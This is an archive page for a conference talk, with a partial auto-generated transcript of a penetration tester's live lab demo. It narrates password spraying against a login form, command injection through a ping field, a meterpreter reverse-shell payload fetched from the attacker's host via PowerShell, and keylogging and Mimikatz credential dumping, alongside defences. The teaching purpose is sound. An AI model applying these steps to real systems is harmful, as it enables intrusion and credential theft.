Hacking in 2016 - How is our systems broken? - TIB AV-Portal

Hacking in 2016 - How is our systems broken?

00:00

6

Norwegian Developers Conference (NDC)

Formal Metadata

Title

Hacking in 2016 - How is our systems broken?

Title of Series

Number of Parts

96

Author

License

CC Attribution - NonCommercial - ShareAlike 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal and non-commercial purpose as long as the work is attributed to the author in the manner specified by the author or licensor and the work or content is shared also in adapted form only under the conditions of this

Identifiers

10.5446/51721 (DOI)

Publisher

Norwegian Developers Conference (NDC)

Release Date

Language

Content Metadata

Subject Area

Computer Science

Genre

Conference/Talk

Abstract

From zero to to hero - Total domination. In this presentation, Chris Dale shows how a typical network is compromised through multiple levels of exploitation. The talk is very demo intensive and hands on, proving how an attacker with extremely limited access to an organization is still able to get a foothold, even with no apparent vulnerabilities present. Once a foothold is gained, the attack surface increases. The attacker uses the increased attack surface to compromise further into the organisation, eventually gaining all the keys to the kingdom. If you are curious on how a hacker accomplishes their goals, how they work and the attacks that take place, this hs the talk for you.

Speech

Text

Image

00:00

Dependent and independent variablesData managementPenetrationstestInformation securitySoftware testingHacker (term)Vulnerability (computing)Server (computing)Term (mathematics)Demo (music)Game theoryEnumerated typeDomain nameServer (computing)FlagDifferent (Kate Ryan album)Tournament (medieval)ResultantHacker (term)Goodness of fitAsynchronous Transfer ModeMultiplication signOrder (biology)Exploit (computer security)Presentation of a groupSoftwareDatabasePhysical systemStandard deviationDemo (music)Web 2.0Key (cryptography)Dependent and independent variablesCybersexProcess (computing)Keyboard shortcutSystem administratorSemiconductor memoryIntegrated development environmentSoftware testingSelf-organizationSoftware developerLimit (category theory)InformationInformation securityBackdoor (computing)Internet service providerEvent horizonWebsiteRight angleVideoconferencingControl flowGame controllerLaptopCuboidPlanningCASE <Informatik>TouchscreenComputer animation

04:38

RandomizationPasswordEnumerated typeLoginSurfacePhysical systemHacker (term)Service (economics)Type theoryInjektivitätWebsiteSystem administratorForm (programming)Electronic mailing listSoftware testingRight angleInternetworkingSoftwareVulnerability (computing)SequelString (computer science)Computer animation

06:30

Convex hullRule of inferenceWeb browserDifferent (Kate Ryan album)Physical systemComputer wormComputer fileWeb 2.0State of matterEnumerated typeHTTP cookieServer (computing)Proxy serverMultiplication signPasswordLoginDefault (computer science)Web pageWordElectronic mailing listSystem administratorMultiplicationType theoryObject-oriented programmingField (computer science)Set (mathematics)Software testingComputer configurationExistenceString (computer science)Arithmetic meanComputer animation

09:29

RootInfinite conjugacy class propertyFile formatConvex hullSoftware testingCartesian coordinate systemPattern languageQuicksortDefault (computer science)Error messageWeb 2.01 (number)System administratorExistenceMathematicsDifferent (Kate Ryan album)Boom (sailing)PasswordPhysical systemSeries (mathematics)Server (computing)Electronic mailing listRouter (computing)LengthField (computer science)Vulnerability (computing)Patch (Unix)Dependent and independent variablesNetwork topologyBit rateRight angleCASE <Informatik>LoginStructural loadOutlierComputer animation

12:00

Game theoryDemo (music)Enumerated typeCAPTCHABit rateHacker (term)PasswordLengthDifferent (Kate Ryan album)Computer wormRight angleQuicksortLoginDependent and independent variablesForm (programming)Slide rulePhysical systemCartesian coordinate systemFunctional (mathematics)SurfaceIP addressServer (computing)SoftwareSoftware testingWeb 2.0Computer-assisted translationVolumenvisualisierungDisk read-and-write headBlock (periodic table)Proxy serverCAPTCHANetwork topologyComputer animationXMLUML

14:23

CAPTCHABit rateHacker (term)Vector graphicsSurfaceVirtuelles privates NetzwerkPasswordDemo (music)Condition numberExploit (computer security)Physical systemAuthenticationWeb 2.0Data managementFacebookService (economics)Web applicationGame theoryBackdoor (computing)PasswordVirtuelles privates NetzwerkMultiplication signAlgorithmLoginForm (programming)Computer-assisted translationServer (computing)Hash functionInformation securityRight angleSoftware developerGoodness of fitTable (information)Cartesian coordinate systemUniqueness quantificationSoftwareComputer animation

16:48

Information securityServer (computing)IP addressDatabaseSoftware developerParameter (computer programming)Web pageOrder (biology)QuicksortElectronic mailing listFunctional (mathematics)InjektivitätInverter (logic gate)Hacker (term)XML

18:16

LoginAddress spaceMaxima and minimaServer (computing)AverageApproximationAnnulus (mathematics)CAN busInterior (topology)Execution unitSoftware developerBackdoor (computing)Physical systemWindowFunctional (mathematics)CodeDirectory serviceContent (media)Attribute grammarMultiplication signIP addressGame theoryRight angleElectronic mailing listGoodness of fitHidden Markov modelDependent and independent variablesParameter (computer programming)Server (computing)CuboidLocal ringXML

20:54

Source codeLengthServer (computing)Address spaceoutputComputer programmingIntegrated development environmentMemory managementVariable (mathematics)Web 2.0User profileRight angleType theoryDemo (music)Server (computing)Dependent and independent variablesXML

22:01

Vulnerability (computing)Firewall (computing)Coding theorySource codeFluid staticsPenetrationstestDemo (music)Ideal (ethics)Backdoor (computing)Recursive descent parserRegulärer Ausdruck <Textverarbeitung>NumberFirewall (computing)Proxy serveroutputBitType theorySoftware developerSource codeIP addressOpen setCross-site scriptingWeb applicationVulnerability (computing)Software testingField (computer science)Rule of inferenceCartesian coordinate systemCASE <Informatik>MereologyGraphical user interfaceDot productMathematical analysisFormal verificationComputer animation

24:15

Sanitary sewerChemical equationInterior (topology)Execution unitBackdoor (computing)Software developerCheat <Computerspiel>Computer virusInformation securityServer (computing)MalwareFirewall (computing)Single-precision floating-point formatRule of inferenceSoftware frameworkInternetworkingConnected spaceComputer fileDomain nameIP addressSoftwareMereologyWindowPhysical systemRootkitVisualization (computer graphics)Web 2.0Right angleGoodness of fitClique-widthComputer wormPartial derivativeSource codeXML

26:55

Web browserWeb 2.0Computer wormComputer fileUniform resource locatorVirtual machineCuboidXMLUML

27:39

Sanitary sewerAddress spaceManufacturing execution systemFreewareComputer fileGoodness of fitComputer virusSoftware frameworkWeb 2.0Hacker (term)Physical systemServer (computing)Data storage deviceRemote administrationIP addressBackdoor (computing)Directory serviceRight angleInjektivitätComputer configurationMalwareInternetworkingUser profileSource codeProgram flowchartXMLUML

29:45

Address spaceBackdoor (computing)WindowComputer fileRight angleUser profilePhysical systemOrder (biology)Source codeXML

30:29

FreewareServer (computing)TouchscreenBackdoor (computing)Traffic reportingPhysical systemClient (computing)Function (mathematics)Keyboard shortcutSoftware1 (number)Streaming mediaComputer-assisted translationWebcamCartesian coordinate systemFunctional (mathematics)Web 2.0Thread (computing)CodeSemiconductor memoryProcess (computing)Connected spaceWave packetDifferent (Kate Ryan album)Right angleMalwareComputer virusFacebookRootkitQueue (abstract data type)Multiplication signGastropod shellType theoryInterpreter (computing)Capability Maturity ModelComputer fileSource codeComputer animation

32:57

Ideal (ethics)Backdoor (computing)Recursive descent parserDemo (music)FreewareGroup actionPhysical systemPasswordMultiplication signComputer fileHash functionComputer animationSource codeXML

33:44

FreewareCoroutineWindowGastropod shellType theoryHacker (term)Software development kitVideo gamePhysical systemComputer fileRight angleSession Initiation ProtocolException handlingPartial derivativeOperating systemEmailService (economics)Online helpElectronic mailing listOperator (mathematics)Interpreter (computing)Source codeComputer animation

35:34

FreewareType theoryRight angleSemiconductor memoryForm (programming)WindowComputer-assisted translationGoodness of fitPasswordComputer fileSource codeComputer animation

36:29

FreewareLocal ringPasswordSoftware developerWindowSpacetime.NET FrameworkProcess (computing)CodeSemiconductor memoryCASE <Informatik>System administratorBitWeightInformation securityLoginSource codeXMLComputer animation

37:20

Computer clusterFreewareSimultaneous localization and mappingLocal ringModule (mathematics)AuthenticationWeb 2.0WindowDifferent (Kate Ryan album)PasswordSemiconductor memoryGoodness of fitMechanism designHash functionSystem administratorFunction (mathematics)Information securityNeuroinformatikServer (computing)Electronic mailing listSoftware crackingComputer-assisted translationRepresentation (politics)Source code

38:49

TrailComputer-assisted translationPasswordElectronic mailing listDomain nameWordHash functionRight angle2 (number)Game controllerData managementSoftware crackingInheritance (object-oriented programming)Source codeComputer animation

40:13

Windows ServerServer (computing)Web 2.0Scripting languageVirtual machineMiniDiscGraphical user interfacePhysical systemSoftwareRadical (chemistry)WindowRight angleLocal ringComputer animation

41:00

Ideal (ethics)Backdoor (computing)Demo (music)Antivirus softwareFirewall (computing)Rule of inferenceProxy serverPasswordSoftware crackingTime domainLocal ringTraffic reportingMultiplication signProxy serverIntegrated development environmentSystem administratorWeb 2.0Key (cryptography)WindowServer (computing)Exception handlingDomain nameOperator (mathematics)InternetworkingLocal ringConnected spaceRule of inferenceState of matterFirewall (computing)Antivirus softwareRight angleEntire functionComputer fileComputer animation

43:08

Windows ServerServer (computing)Chemical equationExecution unitStructural loadPhysical systemComputer fileRight angleMultiplicationAuthenticationType theoryMessage passingDirectory servicePoint (geometry)WindowParameter (computer programming)Web 2.0Semiconductor memoryGame controllerKerberos <Kryptologie>Mobile appInteractive televisionModule (mathematics)Automatic differentiationGroup actionHash functionSystem administratorWeightFerry CorstenDomain nameMappingScripting languageVulnerability (computing)Connected spaceIP addressDatei-ServerInformationServer (computing)Proof theoryDemo (music)Virtual machineCommunications protocolSoftware development kitPasswordTablet computerPiMultiplication signData managementRule of inferenceNumberHoaxPatch (Unix)CodeIntegrated development environmentHacker (term)String (computer science)IdentifiabilityGoodness of fitSource code

51:58

Core dumpActive DirectoryHash functionTime domainMathematicsTwitterEmailSystem administratorMultiplication signHash functionDifferent (Kate Ryan album)Physical systemLink (knot theory)Information securityRotationIntegrated development environmentDomain nameLatent heatPatch (Unix)WindowGame controllerCASE <Informatik>Source codeCore dumpPasswordDemo (music)Service (economics)Mechanism designRepresentation (politics)Client (computing)Hacker (term)Right angleQuicksortGoodness of fitEntire functionSelf-organizationLocal ringOpen sourceComputer animation

Transcript: English(auto-generated)

00:04

Alright, I think we're good to go. So welcome, welcome, welcome. This talk is a demo-based talk, so it's gonna be a lot of hacking, it's gonna be a lot of keyboard activity, there's gonna be demos, alright? So things might break, don't worry, usually we fix it, okay?

00:25

Don't feel bad for me if something breaks, if something doesn't work, don't worry about it, I don't. This is hacking, things tend to break, okay? Normally things run okay, but still, we're gonna mess around with some memory stuff,

00:41

we're gonna mess around with backdoors, things can crash, and so on. So I'm Chris Dale, I'm not Moriarty, Moriarty is a supervillain from the Sherlock Holmes books and videos, right? He's, in this case, the super hacker, because how can Moriarty always stay one step ahead

01:01

of the good guys? How is he always one step ahead of the detective Sherlock Holmes? In my opinion, it's quite obvious. He is the super hacker, and he has access to all the systems, all the backhands, so he knows their plans, he knows what they're gonna do, when they're gonna do it. That way, he can stay one step ahead.

01:20

So hacking is awesome, it's the way of the future for terrorists, for criminals, and that's why we also need to educate ourselves within cyber security, only because it's so tremendously big and important. My daily job is penetration testing, instant response, normally some people laugh when I say penetration testing, because it sounds kind of funny, but it's basically just ethical

01:45

hacking, professional hacking, right, so I try to break into customer systems in order to determine the business risk involved with those systems. I'm also a teacher for SANS, so I travel around the world, teaching hacking techniques and instant response and exploits and stuff like that, so I have a good time teaching

02:02

all around the world, like Saudi Arabia was my last destination, like crazy everywhere they send me. So it's pretty cool. On my spare time, I also do a lot of hacking, so I'm actually lucky enough to have my hobby as my day job, because I always like to hack, and some of the results from hacking has been

02:21

medals and prizes from different competitions, for example, I went to Washington DC to play in what we call a tournament of champions, previous winners of capture the flag events, like competitions for hacking the most servers within a certain time limit. I went there and I placed 20th out of 164, that's not too shabby, but still, there

02:44

is a lot of community within information security, and if you want to get involved, please do so, because we need people, we need bright people, and especially people who have developer backgrounds to help us actually combat the techniques and tools that the bad guys are using.

03:01

So this talk, basically, we're going to be hacking, right, as I said, we're going to be hacking servers, and Moriarty is going to start out at a web server, so we're targeting an organisation called Leet Host, it's a hosting provider, and this organisation is actually quite secure when it comes to their external network, so they've had a lot

03:23

of penetration tests happening, however, we're still going to look at how we can break in, so we're going to find the vulnerability, we're going to hack the web server, we're going to upload backdoors, and then we're going to make our way into the domain, and eventually, we're going to try to get keys to the kingdom, which is the domain administrator, right, so domain admin is like, when you have that, you can control

03:44

the entire business. So my demo environment is quite simple, on my laptop, I have everything virtualised, I have my attacker, a Linux box, which is basically just Kali Linux virtualised, it's on the same host-only network as a server 2012, which has a web server and a database

04:05

on it. Kind of standard set-up, right, and behind that, so this is a DMZ, behind that I have my domain controller, which will serve the users, will serve policies and such on. So as I said, it's a demo-based presentation, so why don't we just get on hacking, huh?

04:24

So let's start with looking at the website, like that, just let me fix my presentation mode a sec, let me duplicate the screen, looks good, so this is it, right? This is everything that is exposed, and let me challenge the audience.

04:43

What would be your initial thought on how to hack this form? Anyone like SQL injection, yes! So we're not going to do that, nope, because that would be easy, okay? So not too many customers today have SQL injection in their logins form still, because

05:03

customers, they tend to get audited and pen-tested on their external networks, so a lot of people have been slamming these services and log-in forms already auditing for known vulnerabilities, right? So instead, we're going to look at something called username enumeration and password spraying,

05:22

because what does most, every single system have on the internet? They have log-in forms. If you can have a list of usernames, and if you can find just one user with a bad password, you will extend your attack surface of that system, and a lot of customers today,

05:41

they will only have their external site pen-tested because everyone already authenticated is trusted. We trust our users, right? That's a big mistake. All right, so let's try to log on with something like admin admin, right? I always try to figure out the system before I try to hack something.

06:02

You will always see some new hacker immediately trying to hack something before he even understands what the system is doing. So first of all, we try to see what this system is doing, and it says, look, the log-in failed, check your password, right? That's interesting, not too subtle, but that's interesting that it says check your password.

06:24

So what if I type in a random string? Blah, blah, and this C, test. It says log-in failed, check your log-in name, parenthesis username. So that's interesting, right? It's very explicit in this example, but by actually testing admin and a username that we know don't exist,

06:46

we could immediately see that, look, we know that admin exists. So now we can use our word list to check which other users exist. For example, I could scrape the LinkedIn page of all the employees of the business and try first names against last names and so on to see, is there any usernames that

07:04

exist in this system? If there are, they might have a weak password that we can attack. So we're gonna default back to attacking users. It's always the easiest way in somewhere. So how do we go about attacking this? Well, first of all, I need to have a proxy set up.

07:21

A proxy is just a tool which will capture all the requests from my web browser before they are being sent to the web server. Let me demonstrate. I'll try log-on again with like admin, admin, and right away we can see that, look, it has captured my request to the web server. I'm posting some data, I'm posting username admin, password admin, let's go.

07:44

So this request, when I press forward, this is what will be sent to the web server. And now I can edit it and I can do whatever I want. But the interesting thing to do when doing a username enumeration is using what we call a fuzzer. A fuzzer is just a tool that will try multiple different types of values

08:02

within a short time span or whatever time span we set. So I just sent my request, my login request, to a fuzzer and let me edit my little request. First of all, let me remove the cookie because the cookie is going to make the web server have some kind of state on me.

08:22

I don't want that. I want every request to be a fresh request. And then I'll define that, look, this little value here, admin, I replace it with some special characters, meaning that this value should be replaced with whatever payload I set. Whatever value I want it to be replaced with, it will be replaced.

08:44

And let's look at some values to replace. So I have a little text file with different usernames, known usernames from Linux systems like PHPBB and so on. Just a list of typical usernames, okay? So I've just loaded these in here and every single one of these text strings will be replaced within here.

09:07

Right? Quite simple. So these values down here are testing. Then I need to do some quick options because this logon field is kind of special, so it has some funky settings, so I need to process redirections and I need to process cookies.

09:24

And basically, that's it. Let's see what happens when we press attack. Oops. It's not going to take 10 minutes, don't worry. So immediately you will see that my system is now trying to log in with different usernames, boom, boom, boom, boom, boom, boom. Just different usernames, go, go, go, go.

09:40

All with the same password, admin, right? So we're not really trying to log on with any users, we're just trying to see what the error message is. Let me demonstrate the error message in my tool. Log in failed, check your password, right? That means that this username of admin exists.

10:04

And also notice that the content length of this request, the request, the response, sorry, coming back from the web server is 1472. Well, all the other ones are 1485, right? So we have an outlier. So let's sort by those and see, look,

10:21

suddenly we have a pattern of what we can assume is known usernames within application. That is a really interesting thing to find. However, most pen testers today, they would classify this finding as a low, maybe medium risk finding in your application. And it probably won't recommend you to patch it immediately.

10:42

Well, perhaps it should, we'll see in a minute, right? So now that we have a list of users, let's take those users and add them to the list again. In our flutter, let's define another value, the password field.

11:00

Now we want to try all the known usernames against weak passwords. And typical weak passwords will be like, for this case, it will be lead host 2016, summer 16, lito sucks 16 for those that don't like their company and their employer, and so on. So let me show you how I can change my attack

11:22

that for every username, I will try a full list of passwords, okay? So I'll change my attack to what they've dubbed cluster bomb attack. Sounds fancy, right? And I'll give it a list of passwords. So these passwords in here, those are just like abc123, access admin, admin123,

11:43

change me, change me is actually a lot of places for default configuration on switches and routers and stuff. It's quite, quite nasty. So just a series of passwords, right? Oh, let's try again. So you'll see, it's trying for every username now,

12:02

it's trying the password AAA. And then it starts doing abc for every username. Oh, sorry. So it's just trying to log on, right? And how do we determine who is logged on? Well, again, we just sort by the length to see what is the difference? Who is the outlier here? And immediately, we see that the payload on the left side,

12:23

Gordon B, username Gordon B, seems to have the password abc123. And let's check. Let's check what responses have come back from the web server. Let's do the render. Ooh, dun-dun-dun-dun-dun-dun.

12:40

Ah-ha, it says greetings, Gordon B. So a very simple attack showing how we could actually find a user to gain a login with. Let's see, Gordon B. Actually, this is still hanging in my proxy, so let's go back here. Let's try to log on with Gordon B. Gordon B, abc123.

13:03

And it works, right? So suddenly, we now have an increased attack surface. And this is important because this is the place most businesses forget to test. So in my pen-testing endeavors, I always ask to have credentials from a user. Like, give me a test user

13:21

so I can test within the application itself, because we need to assume that the bad guys already have access to our internal network and our external applications as a login user. We have to assume that. We have to assume the worst. And most likely, they do have some kind of access if they want access.

13:40

So we got some functionality here. We'll look at that in a second, but just a couple of quick PowerPoint slides. So how do you protect against this? Well, we could simply shun users or IP addresses that make multiple failed logins, right? That could be really problematic, especially when you have big customers that are all coming from one IP

14:01

and they're using your system and they might have like 200, 300 failed login attempts per day, for example. So you can't just block someone per an IP. You could implement CAPTCHA. You know, these little tax forms that will ask you questions like, find a cat. Whoa! Oh, nice. So we got one guy giving me a heads up.

14:22

Look at this stuff. And all the rest of you are like, ah, this guy is making a fool of himself. But let me try to duplicate it and do an F5. And we need to go, I actually shouldn't do F5. I should actually do the button. So where you have to figure out the pictures of the cats

14:41

and you click the cats and you can log in once you have done those things, right? So that works somewhat, but we can break those as well. So it helps adding an extra layer of security. You could make the attack really slow. So the login form could take a really long time to process.

15:00

That is actually good practice. As developers, you guys should make the login forms take a long time because the password algorithm that you're using to hash the passwords, hopefully you are doing that, should be slow. It should be slow. It should take like a second or two or three to create the password hash of the user's password.

15:24

So that compare should also take time. And of course, two-factor authentication would definitely break this attack, most likely, right? If I had to steal someone's phone, it would be harder. So with that, we can now see what else exists on this web server. And I'd like to remind you though,

15:41

this could be game over from here. We have Gordon B's username and his password, right? What is the chances that Gordon B is using a different password for every single service he is using? It's quite low, right? I actually do it. I have a password manager and I have like unique passwords for everything.

16:01

So I could actually show you my Facebook password and it wouldn't really hurt anyone because it's like this long. And if you could remember that, I would love to have you hack me like that. That would be cool. But think of like VPN endpoints. A lot of businesses have some kind of VPN login somewhere. Could you just log on with Gordon B, ABC123

16:20

on their VPN and have internal access to the network? I think you could. Most likely you could just port scan their network, find their VPN endpoint, authenticate and it's game over. Could be that easy, right? But no, we're gonna look at this web application, we're gonna find some exploits and we're gonna see how we can use it

16:41

to gain a backdoor on the system. So let's see, back to the web application. Let me do this, like that. So we seem to have some kind of functionality here, right? It looks like a control panel of some sort.

17:01

We can ping a server, we can do a user search and we have an about us page. This about us page is interesting because it says that if you're worried about security, you shouldn't be because they have everything in order. Really, you're laughing but if you think about it, what is most vendors saying to you today?

17:20

Oh, you look security worried about it? Don't worry, we have like the best teams in the world, they're all on top of everything. All right, so there's some interesting invertibilities in every single pager. That's, all right, so I know the developer who made this. It might be me but there's some interesting parameters up here that's interesting.

17:41

The user search might be connected to a database so there might be some SQL injection going on. However, for this audience, because most of you aren't security people, I'll be demonstrating the ping a server hack. So in this example, it says enter the IP address you want to ping and there's a list of the IP addresses

18:01

that most likely, those are mine, right? Those are Gordon B.'s IP addresses. So always, the first thing we do, try the functionality and see how it works. So we click ping, ping that IP address, one of the lists and it gives us the reply. And this reply is kind of familiar, isn't it? What does it look like?

18:24

It looks like ping, yeah, but it looks like ping from Windows, like from the Windows command line. So immediately we're thinking, aha, the developer probably didn't want to write his own ping in PHP or .NET, right? So he just made a system call down to the OS and made an OS ping for him

18:41

and just read the response from that. Really good idea because then you don't have to rewrite functionality, you can basically just reuse it and should be good, right? So let's try something else, like an interesting IP address to ping would maybe be like localhost. Can I ping something else that isn't in the list? Just to learn, right?

19:01

I'm interested, I'm curious. Aha, I get four replies from localhost. So it looks like I can ping anything. So I could perhaps try to ping Google if it was online or I could ping anyone. I could tickle you with a ping if I wanted to. But do I really want to do that? No, let's try something else. Let's try to add parameters, like only ping one time.

19:21

Does this work? And immediately I got a response. Much quicker, right? Aha, so I can actually add attributes to the ping command. Hmm, what about Windows and Linux, Solaris, and most likely all the OSes? They have a way to concaticate commands.

19:40

So if you have one command on the left side, if that runs okay, run this command. Let's try that, let's see, let's see, let's see. The ampersand will concatenate another command. Let's try like dir, like show the directory contents. Aha, suddenly we have like some kind of code execution,

20:01

right, but we're limited to the commands in the OS. So what would be like, from here, how would you hack this server? You can run any command on Windows that you want. How would you do it? Say what? Python, yeah, definitely try Python. But we're on a Windows box, and,

20:22

so let's try, let's try PowerShell, right? Yes, let's try PowerShell. By the way, if this was Linux, this would be game over from here, okay? We would do like a netcat backdoor and we would have a full functionality backdoor within two minutes, right, from here. But we still have like 40 minutes to go, so.

20:46

So I'll do PowerShell command, and I'll do the ls command, which is basically the same thing as dir. PowerShell dash command, ls, and suddenly we have the same type of input. So now we have a programming environment at our hands.

21:02

The attacker can now basically run any programming, PowerShell programming command, commandlet, that he wants to, and that gives us flexibility, right? That gives us a heap of flexibility. So let's see if we can find something interesting. For example, which user are we running? Like, can I do like ls percent user profile?

21:22

Can I expand variables? And it looks like it can. Looks like we're running as a user leetweb.leethosts. So leethosts, like, missing a seven in there. I wonder why. It was a typo when I set up the server. I noticed it like when I started my demo,

21:40

and I'm like, why is there a missing a seven? I'm so stupid, I was thinking. But right. So we can now agree that this is quite dangerous, right? We can run anything, and we can get responses back with PowerShell.

22:00

So let's do a quick recap of what actually went wrong here, and how we can defend against this type of attack. So first of all, developers made a mistake. They didn't properly sanitize the input coming from the user. They didn't think that you could actually break out of the command and actually do different stuff.

22:20

So there should definitely be some whitelisting and filtering going on, for sure. A web application firewall could have rules preventing this type of attack. However, in most cases, we're able to bypass those. Okay, it just takes a little bit more trying and failing, and we can most likely bypass web application firewalls. But they're still nice to have, don't get me wrong.

22:42

Also, web application firewalls support whitelisting, so you can set up a regex saying that, look, an IP address should only have like three numbers and a dot, one to three numbers and a dot, and so on. That would be really hard to hack, wouldn't it? If the only characters that you can input into that field was numbers and dots, I don't know how to hack that,

23:01

so that's definitely something good. What about source code analysis? You could have tools, there are lots of tools out there, free and commercial, that will automatically scan your source code looking for known weaknesses, like, oh, here's a blunder. This is most likely a blunder because you're using the exec command, for example.

23:21

It's very dangerous. Oh, you have a cross-site scripting vulnerability because you're not filtering. So there are tools to do that for you. And of course, penetration testing would definitely find this. I mean, if your pen test team doesn't find something as open as this, yeah, you should have a refund, to be honest. And there's the vulnerability scanning parts,

23:41

which is basically a tool that will try to simulate an attacker and see what's going on. But still, we're not done yet, right? We need more access. We, Moriarty, he's quite crazy, so he's not gonna give up from just having some kind of remote command execution. He wants full access.

24:00

So preferably, we want to have RDP, okay? Some kind of GUI, just so we can show that the mouse is moving around and things are happening, okay? So let's see how that works. So bring up my Firefox. So how would we go about uploading a backdoor?

24:24

What's that all about? Well, first, we need to create the backdoor. We need to create some kind of malware slash virus to actually help us out. That's quite simple. So it's actually super simple today because as they do in the developer world, they also do it in the security industry.

24:42

They try to make things as simple as possible to show the impact of something, right? So right here is my server. I'm not gonna touch that because that would be cheating. But here is my Linux. Hopefully, things are working. You never know, but let's see. Actually, there's some debugging from before.

25:03

Let me check my IP address. Looks like I'm on the same network. You can all see that, right, in the back? Is it okay, size? Good stuff. So I'm on the same network, so I should be able to ping one or two, 68. Looks good, right? So in Kali Linux,

25:21

there is a tool called MSF Venom. It's packaged within a framework called Metasploit. MSF Venom allows us to create viruses. We can create PowerShell viruses, Visual Basic viruses, Linux viruses, and executable files.

25:41

So let's create an executable file. Let's see if I have, nope. So I have a little cheat sheet. I'm gonna copy-paste some things just because it makes things easier. You guys don't wanna show, you don't really wanna see my typos going on everywhere. So let's paste that in here. So I'm telling my little MSF Venom tool

26:03

that I wanna create an executable with the payload, meterpreter. Meterpreter is an in-memory rootkit for Windows. It will allow me full access to the system. With permissions, the user is running us. So that's the first part here. And then we have a remote connection coming back to us.

26:22

So we're telling anyone who is clicking our file that we will be creating now, they should be connecting back to our IP address. So normally this would be an online IP address, right? I would have my domain name in there. I have a special pen-testing domain name which I use for this stuff. And which port they should connect on. So this will bypass every single firewall rule

26:41

in the world, most likely, because people are not filtering where they are allowed to go on the internet. Most of the people aren't. And we'll put this inside our web server. So let's see, can I actually visit this, my own attacking machine now and see if there's a backdoor.exe?

27:03

Yes. So when I visit my little URL from the attacker machine up here, this is my Linux box, we have our payload ready, the executable is ready to be sent somewhere, right? How do we get this file on board? Well, with PowerShell,

27:21

maybe some of you guys know this already, but you can actually do just about everything with PowerShell, okay? So we can actually do a simple command called invoke web request. And it will actually pretend to be a little browser and it will go out online pulling down whatever file you want. So that's interesting. Let me copy that little command as well from the chit-chit

27:41

just to make sure we don't have typos. So I'll show you. So we do the PowerShell, this is our command injection, right? We have PowerShell dash command, invoke web request, really nice cmdlet, and we point it to our attacker IP address. We point it to the backdoor.exe,

28:02

I'm sorry if it's a little bit small. And we say, look, this file should be written to the user profile, which is people's home directory, right? Slash user slash lead host and so on. And we'll name the file backdoor.exe. Let's see what happens. Did I click?

28:21

Oh yeah, I did click. Looks like it clicked. Let's see if we can see if the file has been written. So we'll do ls user profile. And voila, we now suddenly have a file on the system. We told PowerShell through the web server

28:41

to, hey, go out to the internet, pull down a file, pull down malware, and store it on the system. But we haven't executed anything, have we? No, we just downloaded it. Before we run it, though, we need to set up a server. We need to have some kind of way to process a backdoor coming back to us.

29:00

So for that, I'm gonna be using the Metasploit framework. Basically, it's a framework for hacking. Makes things simple. Let's see if we can find it. Should have it up in the background here. We have some options, just verifying that everything is looking good.

29:21

And I'll set up my little server. So this server will just wait for anyone who is trying to connect back to me with the virus I've created. And if they are clicking on a virus, connecting back to me, we should interact with it and have some kind of remote control.

29:41

So let's see what happens if we click the file. Huh, you click the file. Well, you don't really click the file, but you run the file, right? You use PowerShell. Don't even need to use PowerShell. Let's just do ampersand, user profile, slash backdoor.exe. This should run the command, shouldn't it?

30:02

Just like you would run ping from System32 or a Windows folder, this should run this executable. So let's see. It's just hanging. Oh, it doesn't return anything, right? That's interesting, because it's waiting for this executable to complete.

30:22

Just like it was waiting for ping to complete, it's waiting for backdoor to complete. And backdoor is connecting back to me. So let's look at our Linux and see if we have anything going on. Oh, we do. It says, look, meterpreter session two has been opened. You have an incoming connection from this web server.

30:40

Interesting. Let's try to interact with it. Suddenly, we have command execution from a shell. So we can run d-i-r-l, oh, sorry, ls. We can type get uid, for example. Or let's do help. Let's look at the commands we can actually run from this. So I can kill any process that I want to.

31:01

I can migrate my process so instead of being inside the Apache web server, I can migrate the whole rootkit, the code of it, true memory into, for example, explorer.exe. Because explorer.exe is never closed, right? So it's gonna persist my malware, ensuring that it won't get closed when someone reboots the web server

31:22

or a thread or a application pool dies, for example. So very nice functionality. I can cat files, I can remove files, I can upload files. I can do typical networking commands here. And some interesting ones are I can do a key scan start.

31:41

This is a key logger. So I can just start the key logger, have it running for 24 hours, dump the output tomorrow, and I'll have whatever is typed on a keyboard from the server on my system. That's really, really nice. I could even, if this was a client PC, right? If this wasn't a server, I could activate the web camera

32:01

and take a little snapshot of whoever's sitting behind the screen. I could even have a stream data from me. And I've done this a couple of times, specifically for TV2, a big news channel in Norway. And I've done it against Stola Dirigov, a news anchor. He asked me the day before my interview, he asked me, hey, is it like, can you hack my Facebook?

32:21

Is it simple? And it's not really simple to hack Facebook, but it could be simple to hack you. Are you giving me permissions? And he's like, yeah, well, yeah, why not? Yeah, for sure, I got a screenshot of him. His face is kind of, ah. And I also did it to another reporter in TV2. And they're using this material, actually, for internal training right now

32:41

to try to educate people better to don't click viruses, basically. So lots of different cool commands we can do from here. So this is our backdoor running, right? And that's all nice and good. But let's look at some defenses from this. No, wait, we told you that we're gonna gain RDP.

33:03

Sorry, this is not RDP. This is only like a command access. So let's look at how we can get some RDP action here. So on a system, the first thing an attacker will do, if it's remotely good, okay, is going to try dump the password hashes from the system.

33:23

That means it's gonna try to gain the passwords, but they're not in clear text most of the time. They're hashed. So he wants those so he can start tracking them to try to gain passwords because they can be used elsewhere as well. So for that, I want to upload some file, some files.

33:42

So my little tool here, my interpreter, my little backdoor, supports uploading files. As we saw in the help list, I could simply say I want to, did you see that? I should be offline, so I don't want any emails popping up, like, hey Chris,

34:01

it was really fun last night. I don't want that stuff to happen. So I'm going to be uploading my kit, my files. I have a little zip file, right, with all my hacker tools that I want onto the system. Most attackers or hackers, they have their own kit. And we'll upload a kit because it has some interesting features.

34:24

Let's see, it's 18 megabytes, it's fine. And it looks like it uploaded. So from here, I kind of like going back to the Windows command line. So I'll type shell, and look at that, we have the Windows command line at our service.

34:40

So from here, I could do cd dash dash, cd dot dot, cd dot dot, whatever. I could do there, I could do cd users, I could do cd delete web.late host. I could type dr, and I could see that, look, I have my files uploaded. So here's my backdoor that we're currently running, right? We're inside this backdoor.exe,

35:00

but just uploaded these files from my interpreter. So it's a zip file, right? How do you unzip from the command line in Windows? What? You wish, you wish it was just like unzip, like it would be in any other operating system, like Linux, for example. Let's try unzip.

35:20

There's nothing that will help you unzip on Windows from the command line, except partial. And I'll be honest, I'll be honest though, I'm not gonna try type this command because it's hilariously long. Look at this stuff. This is unzipping from the command line in Windows.

35:42

If anyone ever has a better way of doing this than this way, let me know after my talk, okay? But this should hopefully extract my files. And look at that, we have our files extracted. That's good stuff. So inside here, I have a tool called Mimikatz. It's from GitHub, that's fine.

36:00

It's a really nice tool that will try to look through, it will scrape through memory, looking for passwords in clear text and in a hashed form. This tool is actually very, very nice for attackers to use. Let's run it.

36:22

